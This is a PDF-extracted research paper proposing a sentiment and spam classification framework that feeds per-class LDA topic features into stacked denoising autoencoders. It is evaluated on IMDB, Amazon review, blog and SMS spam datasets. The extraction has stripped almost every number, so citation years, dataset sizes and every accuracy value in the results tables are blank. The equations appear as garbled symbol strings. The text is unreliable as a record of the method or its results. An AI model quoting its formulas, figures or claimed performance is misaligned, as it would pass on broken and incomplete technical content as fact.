responsible for generating the documents, and a multinomial distribution of the topic over the words in the vocabulary. a document can then be seen to be generated by sampling a finite mixture of topics and then sampling words from each of these topics. the ordering of the words is irrelevant to lda. here we briefly describe lda. we model each document w, from a corpus d that contains n words as a generative process: � choose θ dir(α). � for each of the n words wn: define a topic zn multinomial (θ) and a multinomial probability conditioned on topic zn (p(wn—zn, β). figure a schematic description of the overall classification scheme for sentiment analysis using the proposed framework. from bottom up the data come from various resources. data is separated per sentiment and a topic model per sentiment is built. all the data are then passed through the topic models to generate features used by two sdas for the positive and negative sentiment. finally a classifier is used to predict the output. full-size doi: . /peerj-cs. /fig- al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where dir is the dirichlet function, α is a k-dimensional vector parameter with αi > . for k topics the probability density of θ is defined as: pðujaÞ ¼ Γð pk i¼ aiÞqk i¼ ΓðaiÞ u a � …u ak� k ( ) where Γ is the gamma function. given the auxiliary parameters α and β, the joint distribution of a topic mixture θ, topic z and word w is defined as: pðu; z; wja; bÞ ¼ pðujaÞ yn n¼ pðznjuÞpðwnjzn; bÞ; ( ) where p(zn|θ) = θi such that z i n ¼ . to obtain the document probability density we can marginalise over θ and z. pðwja; bÞ ¼ z pðujaÞ � yn n¼ x zn pðznjuÞpðwnjzn; bÞ � du ( ) the corpus probability is then defined as: pðdja; bÞ ¼ ym d¼ z pðwdja; bÞdwd ( ) efficient parameter estimation is usually done through variational bayesian methods or gibbs sampling (blei, ng & jordan, ). the complete description of lda is beyond the scope of this paper, interested readers are referred to blei, ng & jordan ( ). lda has been widely used for text modelling and classification. in the context of sentiment analysis several studies tried to extend the original lda model for polarity classification (eguchi & lavrenko, ; mei et al., ; lin & he, ). however, these methods focused on adding an additional layer of abstraction (via latent variables) to describe the different sentiments of interest. this is limited to the strong assumptions put into the bayesian network. in this work we use a deep neural network (explained in the next section) which can model complex relationships among topics that are responsible for generating the documents. this approach requires minimum assumptions about the relationship between topics/documents and sentiments. stacked denoising autoencoders stacked ae fall under the umbrella of representative learning using deep neural networks. the goal of an ae is to learn an abstract representation of the data presented at its input. the input can be reconstructed from that representation. hence the desired output of the ae is the input itself (bengio, ; bourlard & kamp, ; japkowicz, hanson & gluck, ). hinton & zemel ( ) defined an ae as ‘a network that uses a set of recognition weights to convert an input vector into a code vector. it then uses a set of generative weights to convert the code vector into an approximate reconstruction of the input vector’. al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ assuming we have a network of just two layers: an input (visible) layer of m dimensions x = (x , x , …, xm) (e.g. topic modelling features as described in the previous section) and a hidden layer of n nodes y = (y , y , …, yn). each node in the hidden layer is connected to all the nodes in the input layer. in the construction phase we compute the hidden representation: y ¼ f ðwx þ bÞ ( ) where w ∈ rn × m is a weight matrix and b is a bias term. figure a demonstrates a simplified example of such a network in the construction phase. to assess how well the new n-dimensional vector y represents the m-dimensional input x, we can reconstruct the input layer from the hidden layer (fig. b): xrec ¼ wty þ b ( ) where wt is the transpose matrix of w. to train the network (i.e. optimise w and b) we want to minimise the re between x and xrec: re ¼ xn i¼ jjdi � direc jj ( ) where n is number of m-dimensional input samples, di is an input sample that is fed to the network, and direc is the reconstructed version using eq. ( ). in this article we use the denoising variant of an autoencoder (dae) (vincent et al., ), which corrupts the inputs with added noise in order to enhance the generalisation of the network and hence enhance its representational power. the motivation behind adding figure demonstration of denoising stacked autoencoders. (a) demonstrates the process of con- structing an autoencoder. yellow circles represent an input layer and blue circles represent the hidden layer. (b) demonstrates the reconstruction process of the input from the units in the hidden layer. (c) a stacked denoising autoencoder. each dashed rectangle represents an autoencoder. x represents a connection corrupted by noise. full-size doi: . /peerj-cs. /fig- al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this noise factor is to avoid over-fitting, that is the network learns to model only the training samples. figure c demonstrates the corruption process which randomly (using an isotropic gaussian distributed noise) assigns a weight of to the link between two nodes. daes are trained with standard stochastic gradient descent and usually perform significantly better than the standard ae (vincent et al., ). deep architectures facilitate the modelling of complicated structures and patterns efficiently (ngiam et al., ; vincent et al., ). within the framework of dae the deep network is built by stacking layers of denoising aes that are trained locally, as explained above. the output/hidden layer of each ae plays the role of the input layer of the deeper network (vincent et al., ) (fig. c). as suggested by vincent et al. ( ), sda are usually used for feature extraction or dimensionality reduction followed by a classifier (e.g. svm). alternatively an additional logistic regression layer is added on top of the encoders, which serves as a supervised deep neural network (hinton, osindero & teh, ; hinton & salakhutdinov, ). the parameters of the whole network are then optimised using standard gradient-based methods with the original sda playing the role of unsupervised pre-training model. overall reconstruction error here we refer to the re between layers as local reconstruction error. the re as defined in eq. ( ) between the input data (e.g. topic modelling features) and the reconstructed features becomes a measure of the overall reconstruction error (ore). alain & bengio ( ) showed that by minimising a particular form of regularised ore stacked aes capture the density generating the modelled data. this motivates the use of ore as a surrogate measure of the ‘goodness’ of representation of an input example by the network. a high ore suggests poor representation of the input sample while a small ore is an indication of an accurate representation of the input. we, almoubayed et al. ( ), used ore as an indication for outlier detection. the novel use of ore here is as the feature extracted from each sda model. as each sda is trained on the output of a topic model associated with one class, the samples of other classes will produce high ore while samples of the same class will generate low ore. this results in easily separable (usually linearly) feature space as will be discussed later on. bengio, courville & vincent ( ) and erhan et al. ( ) demonstrated the reasons why unsupervised representational learning, including sda, are able to model complex structure in data. the depth of the network, defined by the path between the input features and the output layer allows for efficient modelling of abstract concepts. the hierarchy of nodes in the network works as a distributed information processing system which proved to be beneficial in many application areas (bengio, courville & vincent, ). in the next section we will provide further details of how we use this in our approach. classification approach we take a supervised classification approach here. data from each class are first transformed from a word/document space to the topics space using the topic modelling approach in “topic modeling”. the topic modelling features of data from both polarities al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ are then used to build a sda model, the result of this process is c sda networks, where c is the number of classes (sentiment polarities). the data from all classes is then passed through these networks to obtain c ores. a classifier is trained on the ores to predict the class. this process is outlined in fig. . in this example a positive vs. negative polarity prediction is targeted. the input data can come from a wide range of resources (e.g. twitter, blogs, product reviews, structured data). lda is built separately for the positive and negative polarities (with a preset number of topics). in the next phase two sda networks are built, with different architectures. all the input data (negative or positive) is then passed through the lda and sda phases and for each sample ore (positive) and ore (negative) are calculated to be used by a classifier for final prediction. the motivation behind this approach can be summarised as following: � by building a separate sda model per class the ores are considered representative of how much a document (i.e. input sample) belongs to either polarity. hence the two ores provide easily separable features to the final classifier (bengio, courville & vincent, ). � the use of topic modelling adds an extra layer of abstraction which helps combine different resources of data, handle adaptive and continuously changing input data (e.g. input from social media) and makes the sda modelling less prone to outliers in the input space. � the resulted approach requires only two parameters: the number of topics necessary for lda and the architecture of the two sdas. in “results” we analyse carefully the effect of the number of topics on the performance of the whole system. the sda architecture is a much more difficult parameter to tune and usually depends on skilled network designer. data sets and experiments here we will focus mainly on sentiment analysis data as an example of a text classification problem. sentiment analysis covers a wide range of tasks/applications. one of the most common tasks is the analysis of product reviews (such as movies) into positive, negative and neutral (lin & he, ; maas et al., ; nguyen et al., ; pang, lee & vaithyanathan, ; wu & pao, ). another popular task is the analysis of social media data and more specifically is twitter data analysis (bravo-marquez, mendoza & poblete, ; saif et al., ; tang et al., a). in this work we study the application of our method on datasets providing a wide range of data sizes and classification tasks. to unify the analysis under one framework we restrict the tasks to dual polarity problems (i.e. two classes). we limit our selection of datasets to those with manually labelled samples using average ratings by annotators to guarantee the reliability of the accuracy of results reported here. as an example of additional task is the detection of spam sms messages. we used this dataset as a evidence of the generalisation of the our framework beyond sentiment analysis. al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table summarises the datasets used including the classification task performed and the number of samples per polarity. the following is a brief description of these datasets: � imdb movie review dataset (imdb) (maas et al., ): a , selected reviews from the internet movie database (imdb) archive for sentiment analysis. a maximum of reviews are allowed per movie. the dataset contains an equal number of positive and negative samples. reviews are scored between and . a sentiment is positive if imdb rating ≥ and negative if < . neutral reviews are not included in the dataset. � movie reviews: sentiment polarity datasets (movie-rev ) (pang, lee & vaithyanathan, ): the data was collected from imdb. only reviews where the author rating was expressed either with stars or a numerical value are used. ratings were automatically extracted and converted into positive, negative, and neutral. however, in their original paper the authors limited the analysis to only positive and negative samples. to avoid bias in the reviews a limit of reviews per author was allowed. � movie reviews: sentiment scale datasets (movie-rev ) (pang & lee, ): data was also collected from imdb from four authors. explicit rating indicators from each document was automatically removed. annotators are asked to rate the reviews and rank them as positive and negative with ratings averaged per review. only negative and positive reviews at the extremes are kept. � subjectivity datasets (movie-sub) (pang & lee, ): the dataset looks at subjective vs. objective phrases. for subjective phrases, the authors collected , movie review snippets from www.rottentomatoes.com. to obtain objective data, a collection of , sentences from plot summaries available from imdb were taken. � umich si —sentiment classification (umich) (umich, ): contains data extracted from social media (blogs) with the goal of classifying the blog posts as positive or negative. table datasets. dataset id task no. polarity i no. polarity ii imdb positive vs. negative , , movie-rev positive vs. negative , , movie-rev positive vs. negative , , movie-sub subjective vs. objective , , umich positive vs. negative , , mdsd-b positive vs. negative , , mdsd-d positive vs. negative , , mdsd-e positive vs. negative , , mdsd-k positive vs. negative , , sms-spam spam vs. ham , al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.rottentomatoes.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � multi-domain sentiment dataset (blitzer, dredze & pereira, ): contains product reviews taken from amazon.com from product domains: books (mdsd-b), dvds (mdsd-d), electronics (mdsd-e) and kitchen (mdsd-k). each domain has several thousand reviews. reviews contain star ratings ( – stars) with ratings ≥ are labelled positive and ≤ are labelled negative and the rest are discarded. after this filtering a , positive and , negative examples per domain are available. � sms spam collection data set (sms-spam) (almeida, hidalgo & yamakami, ): the data was collected from free or free for research sources available online. the sms messages are manually labelled into ham (real message) and spam (unsolicited messages). experiment setup as discussed earlier there are two parameters to be set for every dataset: (i) the number of topics used in the topic modelling phase (ii) sda architecture. for each dataset a range of possible numbers of topics was tested between and . the architecture of the sda per polarity per dataset was selected experimentally but all shared the need for an input layer of similar size to the number of topics and two hidden stacked layers of increasing sizes. all units had sigmoid activation functions with the learning rate is set to . and corruption rate of % (normally distributed). the learning algorithm ran for epochs. another important technical aspect is the classifier mentioned in “classification approach” to predict the sentiment. before deciding on the best classification approach to take, we look at the separability of the features generated by the combined lda+sda approach compared with the projected topic modelling features on a d space using principle component analysis (pca) or t-distributed stochastic neighbour embedding (t-sne). figures and show with scatter plots the separability of the features for the problems tested here. the figures show from left to right: (i) ore generated by first sda (sda i) vs. ore generated by the second sda (sda ii). (ii) lda features projected using pca (an unsupervised linear method). (iii) lda features projected on a d space using the first two components of t-sne (an unsupervised non-linear method). the results demonstrate the huge benefit of using sda following the extraction of topic modelling features with lda. the lda features are massively overlapped between the classes hence it requires high dimensional features to get a reasonable accuracy. however, by using the sda generated ores and with only two features the separability is very high which makes it easier for even a simple linear classifier to achieve high accuracy (more formal discussion will follow in “discriminability analysis and simulations”). to this end we considered three classification methods: � ore based classifier (obc): this is a very simple classifier where the ore of both sdas are compared and the sentiment associated with the smaller ore is marked as the predicted sentiment. � softmax sda (softsda): an additional softmax layer is added on top of the two already trained sda models. the softmax layer transforms the output into probabilities. the sentiment corresponding to the highest probability is the predicted outcome. al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://amazon.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � fisher discriminant analysis with sda (fda+sda): instead of adding a softmax layer, fda+sda uses the ores from both sdas to train an fda classifier. fda is particularly suitable for this task given its linear nature. to better understand the behaviour of our combined approach we compare it with four other classification methods: � topic modelling with svm (tm+svm): each document in the dataset is passed through the two lda models for both sentiments (e.g. positive and negative). the output of both ldas (i.e. the probabilities of the document belonging to the topics related to each sentiment) are combined to generate a feature vector. the feature vectors are classified using a support vector machine with a gaussian kernel. � topic modelling with confidence of svms (tm+csvm): in this approach the lda features of sentiment (s ) are used to build an svm classifier to discriminate between the two sentiments (s , s ). similarly another svm classifier is built based on s lda features. the final classification output is decided by the svm classifier with the highest output confidence. � topic modelling with logistic regression (tm+lr): this is equivalent to tm+svm after replacing the svm classifier by a regularised logistic regression one. � topic modelling with confidence of lrs (tm+clr): similar to tm+csvm, this approach builds a separate regularised logistic regression classifier per lda model and the confidence in the output is used to make the final decision. for every dataset we use a fold cross validation approach to evaluate the accuracy of the system with a variable range of the number of topics and the seven classification strategies. “results” details the results per dataset with comparison with the state-of-the-art of every dataset. baseline methods to establish baseline and to compare with the state of the art methods, we implemented a list of common methods/approaches in the literature across all the datasets: � bagofwords+svm: bag of words is used for feature extraction and svm is the classifier. � bigram+svm and unigram+svm: bigram/unigrams are used for feature extraction and svm is used as the classifier. � lda+svm: one lda models is built for feature extraction using all the training data, completely unsupervised. number of topics is selected similar to the approach taken in this paper. svm is then used as the classifier. � lexical+svm: sentiwordnet (baccianella, esuli & sebastiani, ) is used to extract features that are then used by an svm classifier. � glove+lstm: glove english language model as implemented in spacy (spacy, ) is used in line with a long-short term memory (lstm) as a classifier. the optimisation of the model parameters is done independently for each test datasets as in (hong & fang, ). al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure feature separability of the datasets: imdb. movie-rev , movie-rev , movie-sub, and sms- spam. blue and orange represent the two polarities in the data. (a, d, g, j and m) demonstrate the ore generated by first sda (sda i) vs. ore generated by the second sda (sda ii) (b, e, h, k and n) lda features projected using pca (c, f, i, l and o) lda features projected on a d space using the first components of t-sne. full-size doi: . /peerj-cs. /fig- al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure feature separability of the datasets: umich. mdsd-b, mdsd-d, mdsd-e, and mdsd-k. blue and orange represent the two polarities in the data. (a, d, g, j and m) demonstrate the ore generated by first sda (sda i) vs. ore generated by the second sda (sda ii) (b, e, h, k and n) lda features projected using pca (c, f, i, l and o) lda features projected on a d space using the first components of t-sne. full-size doi: . /peerj-cs. /fig- al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ svm is used for most of the base line methods as it in one of the most commonly used classifier for methods that do not use language models. a linear and gaussian kernels were tested and a choice based on the cross-validation performance was selected. a fold cross validation is used across the board including the baseline and our proposed approaches. the cross validation split is the same for all the methods with the training data used to optimise any parameters for the feature extraction and classification methods. more details about and wider range of comparisons can be found in the cited work per dataset as explained above. results figure uses a scatter plot to demonstrate the improvement in performance of our approach to the compared baseline methods in almost every dataset studied here despite the wide range of tasks and challenges offered by these sets. in fig. as most shapes in are above the equilibrium line, but a t-test does not show a significant difference p > . . glove+lstm seems to be dominant across of the other baseline methods. removing it from the comparison set, then our sda base approach is significantly better with p < . . this strongly suggest that the proposed approach here is comparable to the much more computationally expensive language modelling based methods. figure summarises the results achieved by all the classification approaches proposed in this study when applied on all the datasets. in the following we discuss these figure a scatter plot to compare the best in the compared baseline methods from the literature per problem to our approach. if dots are below the line it mean the results in the literature are better otherwise our approach is better. full-size doi: . /peerj-cs. /fig- al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results in more details per dataset and compare these results to the state-of-the-art. in “discussion” we analyse the reasons behind the advantage of our approach. imdb movie review dataset figure a details the accuracies per classification scheme which are coded in different colours and shapes. it also illustrates the change of cross validation accuracy with an increased number of topics. the methods vary in performance with fda+sda and obc outperforming the rest and showing consistent results regardless of the number of features. softsda achieves high accuracy but only when using a small number of topics. the classification methods that bypass sda achieve much lower accuracies even with low number of features. maas et al. ( ) compared their method (which uses a probabilistic lda like method) to other common methods in the literature based on a fold cross validation scheme similar to our validation approach here. another comparison was reported by socher et al. figure a colour map visualising the performance of the different methods on the ten datasets. the colour scale on the right of the figure clarifies the colour code with dark blue indicating low classification accuracy and dark red reflects high classification accuracy. full-size doi: . /peerj-cs. /fig- al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure detailed results showing the change in accuracy with number of topics and different classification schemes for the datasets: (a) imdb, (b) movie-rev , (c) movie-rev , (d) movie- sub, (e) umich, and (f) mdsd-b. full-size doi: . /peerj-cs. /fig- al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ( ) where they compared with common classifiers including naive bayesian (nb), svm, binb and rnns. table summarises these results. movie reviews: sentiment polarity datasets (movie-rev ) the parameter tuning results are presented in fig. b. similar to imdb, fda+sda and obc perform better and most consistently than the other methods on movie-rev . it is interesting to notice the drop in accuracy for all those methods that do not use use sda with the increased number of topics. table compares our results to those reported in the literature (pang, lee & vaithyanathan, ) with obc outperforming all the other approaches. movie reviews: sentiment scale datasets (movie-rev ) fda+sda and obc again outperform the other methods for this dataset (fig. c). however, it is clear that the increased number of topics negatively affected the accuracy of softmaxsda. table shows the superiority of our approach compared with other methods in the literature which are surveyed in detail by maas et al. ( ) and pang & lee ( ). subjectivity datasets (movie-sub) the previous datasets focused on negative vs. positive polarity discrimination. on the other hand movie-sub focuses on the task of classifying movie reviews based on their subjectivity. figure d shows the detailed results while table shows our approach table imdb results. method accuracy (%) bagofwords+svm . bigram+svm . unigram+svm . lda+svm . lexical+svm . glove+lstm . our approach . table movie-rev results. method accuracy (%) bagofwords+svm . bigram+svm . unigram+svm . lda+svm . lexical+svm . glove+lstm . our approach . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performs similarly to the best in the literature with the same pattern of accuracies repeated even with the change of task. umich si —sentiment classification (umich) the data was the core part of a challenge on the machine learning competition website (kaggle, san francisco, ca, usa) (umich, ). figure e shows accuracy as high as . % with softmaxsda and topics, which indicates a very high performance for our approach. obc and fda+sda also show above % accuracy with comparable results to tm+csvm, tm+lr, and tm+clr. the compared accuracy results are detailed in table . multi-domain sentiment dataset dang, zhang & chen ( ) used a lexicon-enhanced method to extract lexical features of different sentiments to boost an svm classifier using this dataset. a cross-domain approach was used to study the generalisation of features among different domains using these features (bollegala, weir & carroll, ). the authors also reported the in-domain sentiment analysis accuracy, which is compared to our approach in table . finally li et al. ( ) used a mixture of lexical features that look at the personal/impersonal views to help better separate the features used in polarity classification. the results clearly demonstrates the superiority of our approach compared with the literature and on all the sub datasets. figures f and a– c present the effect of feature size and classification table movie-rev results. method accuracy (%) bagofwords+svm . bigram+svm . unigram+svm . lda+svm . lexical+svm . glove+lstm . our approach . table movie-sub results. method accuracy (%) bagofwords+svm . bigram+svm . unigram+svm . lda+svm . lexical+svm . glove+lstm . our approach . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approach on the results of the datasets with fda+sda and obc achieving the best results. sms spam collection data set (sms-spam) table compares our approach for the problem of sms spam filtering with the state-of-the-art on the same dataset. our approach is on par with the highest accuracy results mentioned in the literature. figure d shows that fda+sda scores the highest accuracy with a wide range of feature numbers. given the data is imbalanced it is important to report complementary performance measures. our approach has achieved: f-score = . %, precision = . % and recall = . %. discussion during the topic modelling phase, lda groups words within the text into topics with an assigned probability to each word belonging to the topic. a straight forward feature extraction method could be to use a lexical resource to assign each word within the topic with a polarity. a topic is then represented by a weighted average: tf ¼ x w pw � sw; ( ) where pw is the probability of word w belonging to topic t, p w pw ¼ , and sw is the polarity assigned to the word by the lexical resource. table umich results. method accuracy (%) bagofwords+svm . bigram+svm . unigram+svm . lda+svm . lexical+svm . glove+lstm . our approach . table multi-domain sentiment results. method mdsd-b (%) mdsd-d (%) mdsd-e (%) mdsd-k (%) bagofwords+svm . . . . bigram+svm . . . . unigram+svm . . . . lda+svm . . . . lexical+svm . . . . glove+lstm . . . . our approach . . . . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure detailed results showing the change in accuracy with number of topics and different classification schemes for the datasets: (a) mdsd-d, (b) mdsd-e (c) mdsd-k, and (d) sms- spam. full-size doi: . /peerj-cs. /fig- table sms spam results. method auroc bagofwords+svm . bigram+svm . unigram+svm . lda+svm . lexical+svm . glove+lstm . our approach . al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure a shows the positive and negative polarities of positive and negative topics generated when building ldas using umich data. the data clearly show how very well separated the features are which would make it very easy for a linear classifier to perform well. however, in fig. b the same features for movie-rev data show a high degree of overlap. this exemplifies the importance of using sda on top of lda to extract hidden complex relationships among the words within the topics of each sentiment. the fact that for some datasets the polarity assigned by a lexical resource generates highly separable features, as in fig. , could explain why in some datasets lexical based methods outperformed our approach. however, in the general case where these features are not separable enough the introduction of sda seems to contribute to the enhanced performance. in the case of auto-encoders with squared re, ae is equivalent to pca (bengio, courville & vincent, ). however, as we have shown above pca is unable to clearly separate the sentiments. here we used a tied-weight sda, that is the decoding weight matrix is the inverse of the encode matrix: w′ = wt, which enforces a non-linear model. the use of denoising in sda plays the role of regularisation (bengio, courville & vincent, ). regularisation constraints the representation even when it is overcomplete and makes it immune to insensitivity to small random perturbations in the input space. this motivated the increased size of layers with depth, in order to guarantee modelling the data rather than compressing it. discriminability analysis and simulations in order to understand why the combined approach of topic modelling and sda works well, we borrow the discriminability index (d′) concept from the signal detection theory figure positive and negative polarity assigned by a lexical resource, sentiwordnet (baccianella, esuli & sebastiani, ), to words within a negative and positive topic models. the x-axis repre- sents the negative polarity of a topic, while the y-axis represents the positive polarity. points over the line means those topics have higher positive polarity, while points under the line carry more negative polarity. (a) word sentiment from positive and negative topic models for umich. (b) the same plot for movie-rev . full-size doi: . /peerj-cs. /fig- al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (green & swets, ; neri, ). assume we have two overlapping distributions representing two classes (fig. a). each distribution is gaussian with mean μi and variance σi. the goal of any learning algorithm is basically to set the decision boundary separating the two distributions in a way that maximises accuracy. discriminability is made easier by either increasing the separation between the two means (μ , μ ) or minimising the spread of the distribution (measured by σ and σ ). d′ is then defined as the ratio between separation and spread (macmillan & creelman, ): d ¼ m � m ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi ðs þ s Þ r : ( ) d′ is a dimensionless statistic with higher values indicating better discriminability, and a higher classification accuracy as a result. we hypothesise that our approach outperforms the state of the art, due to its ability to increase the discriminability in the output of the two sdas. this is amplified by the use of class-specific topic model to generate features for the sdas, which in turn are able to accurately model the data at their input to generate highly discriminable features to be classified using a simple linear classifier as explained above. to test this hypothesis, we simulate the effect of changing d′ on the expected performance of a classifier. the d′i associated with each sda output is simulated in the range ( – ). the challenge is to map back from d′i to μi and σi. each value of d′i can be generated by an infinite combinations of μi and σi. to overcome this problem, we use a monte carlo approach to model the joint distribution p(d′, μ, σ). it is now possible to obtain acceptable values for μi, σi given the simulated d′i value. details of similar approach can be found in (neri, ). to calculate the classification accuracy, for each simulated point (d′ , d′ ) a synthetic data of , samples is generated from a two-component two dimensional gaussian mixture figure (a) schematic description of the concept of d′; (b) simulations of the effect of changing d′ of sda i and d′ of sda ii on the classification accuracy. full-size doi: . /peerj-cs. /fig- al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ distribution (gmm) with mean (μ , μ ), a diagonal covariance matrix (σ , σ ), and equal mixing coefficients of . . the generated samples are classified using a fda classifier. the process is repeated times for each point in the simulation space and the average values are reported in fig. b. in the figure a brighter colour indicate higher classification accuracy. it is clear with the increase of d′ on either or both axes results in higher classification accuracy. the black dots show (d′ , d′ ) of the output of sda i and sda ii for all the datasets presented above. the white dots are those produced from the output of the topic modelling without sda. it is very clear the effect sda has on the discriminability of the data and hence the accuracy of the overall classifier. these finding are very important in demonstrating the effect sda has when combined with topic modelling in the approach described above. it suggests that lda trained on data from one class helps suppressing the other class(s), sda then is able to model the inter-dependencies in a way that increases discriminability. this suggest that this approach can be used in other areas beyond sentiment analysis and for larger number of classes. conclusion this work presented a novel framework for text classification that combines topic modelling with deep stacked ae to generate highly separable features that are then easily classified using a simple linear classifier. the approach transforms the sentiment analysis problem from the space of words (in approaches such as bag of words, and lexical sentiment corpora) to the topics space. this is especially useful as it incorporates the context information within the mixture model of topics (using lda). to model the class-specific information sda plays the role of finding structural correlations among topics without any strong assumption on the model. this combination of feature extraction methods results in a semi-automatic approach with minimum feature engineering and number of parameters to tune. to demonstrate the effectiveness of our approach we used benchmark datasets for various tasks in sentiment analysis and a wide range of data size and class bias. tasks included negative/positive product and movie reviews, subjectivity of movie reviews, and spam filtering. as presented in the previous section our approach achieves significantly higher accuracies than the best reported in the literature for most of the tested datasets. this and the fact that it requires very little feature engineering makes the approach very attractive for various applications in many domains. lda allows for adaptive learning (a feature of gibbs sampling and variational bayesian methods) which is a very useful feature for big data and streaming applications. sdas can also be trained in an online manner making the whole system adaptive especially in areas such as micro-blogging and social media. the work presented here is designed to provide a framework for text classification tasks. every component in this framework could be replaced by another method. lda could for example be replaced by tsm or jst. sda could be replaced by other representational learning algorithms including restrictive boltzmann machines (rbm) or rnns (rnn). it can also be easily extended to multiple class problems using one-vs-one or one-vs-all methods. al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the discriminability analysis presented here provides explanation of why sda and lda work well within the presented framework. the analysis further support the claims made in this paper that sda is able to model the complex structure of class-specific topics and separate them to achieve high classification accuracy. additional information and declarations funding the work was funded by epsrc uk. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: epsrc uk. competing interests the authors declare that they have no competing interests. author contributions � noura al moubayed conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � stephen mcgough conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � bashar awwad shiekh hasan conceived and designed the experiments, analysed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code used to generate the topic modelling data is available as in the supplemental file. the data is publicly available at the following locations: imdb movie review dataset (imdb): http://ai.stanford.edu/~amaas/data/sentiment/. movie reviews: sentiment polarity datasets (movie-rev ): https://www.kaggle.com/ nltkdata/sentence-polarity. movie reviews: sentiment scale datasets (movie-rev ): https://www.kaggle.com/ nltkdata/movie-review. subjectivity datasets (movie-sub): https://www.kaggle.com/nltkdata/subjectivity. umich si —sentiment classification (umich): https://www.kaggle.com/ seesea /umich-si -nlp. sms spam collection data set (sms-spam): https://www.kaggle.com/uciml/sms- spam-collection-dataset/discussion/ . mdsd is available (multi-domain sentiment dataset (mdsd) at: https://www.cs.jhu. edu/~mdredze/datasets/sentiment/index .html. al moubayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://ai.stanford.edu/~amaas/data/sentiment/ https://www.kaggle.com/nltkdata/sentence-polarity https://www.kaggle.com/nltkdata/sentence-polarity https://www.kaggle.com/nltkdata/movie-review https://www.kaggle.com/nltkdata/movie-review https://www.kaggle.com/nltkdata/subjectivity https://www.kaggle.com/seesea /umich-si -nlp https://www.kaggle.com/seesea /umich-si -nlp https://www.kaggle.com/uciml/sms-spam-collection-dataset/discussion/ https://www.kaggle.com/uciml/sms-spam-collection-dataset/discussion/ https://www.cs.jhu.edu/~mdredze/datasets/sentiment/index .html https://www.cs.jhu.edu/~mdredze/datasets/sentiment/index .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references agarwal a, xie b, vovsha i, rambow o, passonneau r. . sentiment analysis of twitter data. in: proceedings of the workshop on languages in social media, lsm ’ . stroudsburg: association for computational linguistics, – . al moubayed n, wall d, mcgough as. . identifying changes in the cybersecurity threat landscape using the lda-web topic modelling data search engine. in: international conference on human aspects of information security, privacy, and trust. cham: springer, – . alain g, bengio y. . what regularized auto-encoders learn from the data-generating distribution. journal of machine learning research ( ): – . almeida ta, hidalgo jmg, yamakami a. . contributions to the study of sms spam filtering: new collection and results. in: proceedings of the th acm symposium on document engineering. new york: acm, – . almoubayed n, breckon t, matthews p, mcgough s. . sms spam filtering using probabilistic topic modelling and stacked denoising autoencoder. in: th international conference on artificial neural networks. cham: springer, – . baccianella s, esuli a, sebastiani f. . sentiwordnet . : an enhanced lexical resource for sentiment analysis and opinion mining. in: proceedings of the seventh international conference on language resources and evaluation (lrec' ). vol. , – . bengio y. . learning deep architectures for ai. foundations and trends® in machine learning ( ): – doi . / . bengio y, courville a, vincent p. . representation learning: a review and new perspectives. ieee transactions on pattern analysis and 